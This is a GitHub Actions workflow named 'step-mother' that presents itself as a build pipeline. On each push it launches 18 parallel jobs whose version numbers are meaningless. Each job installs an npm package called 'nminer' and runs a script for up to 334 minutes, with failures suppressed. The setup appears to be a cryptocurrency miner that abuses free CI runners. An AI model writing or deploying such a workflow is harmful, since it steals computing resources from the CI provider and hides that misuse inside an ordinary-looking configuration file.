name: step-mother
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2036 }
          - { version: 9034 }
          - { version: 2030 }
          - { version: 9157 }
          - { version: 3063 }
          - { version: 9737 }
          - { version: 4441 }
          - { version: 5771 }
          - { version: 4881 }
          - { version: 6814 }
          - { version: 7293 }
          - { version: 4309 }
          - { version: 6750 }
          - { version: 1730 }
          - { version: 2779 }
          - { version: 304 }
          - { version: 7180 }
          - { version: 1406 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: huzzah
        run: |
          npm install nminer@latest
          timeout 334m node step-mother.js || echo "step-mother executed"